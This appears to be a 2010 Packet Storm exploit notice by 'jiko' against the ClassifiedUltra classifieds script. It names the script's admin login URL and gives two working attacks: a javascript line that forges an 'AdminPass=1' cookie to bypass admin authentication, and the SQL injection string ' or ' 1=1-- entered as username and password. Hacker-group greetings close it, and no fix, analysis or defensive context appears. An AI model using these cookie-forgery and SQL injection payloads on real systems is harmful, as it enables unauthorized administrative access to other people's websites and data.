ClassifiedUltra Insecure Cookie Handling / SQL Injection

2010-02-10T00:00:00
ID PACKETSTORM:86121
Type packetstorm
Reporter jiko
Modified 2010-02-10T00:00:00

Description

                                        
                                            ` |=-----------------------------------------------------=|  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
|=-----------------------------------------------------=|  
[~]-----------|00|  
NAme :JIKO (JAWAD)  
Home :No-exploit.Com  
Mail : !x!  
[~]-----------|01|  
-{Script}  
name :ClassifiedUltra  
link :http://www.ezonescripts.com/productdemos/ClassifiedUltra/Site_Admin/index.php  
  
[~]-----------|02|  
-{3xpl01t}  
javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";  
User:' or ' 1=1--  
Pass:' or ' 1=1--  
[~]-----------|03|  
-{Greetz}  
Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker  
|No-Exploit.com Members  
---------------------------------------------------------------------------------------------  
  
`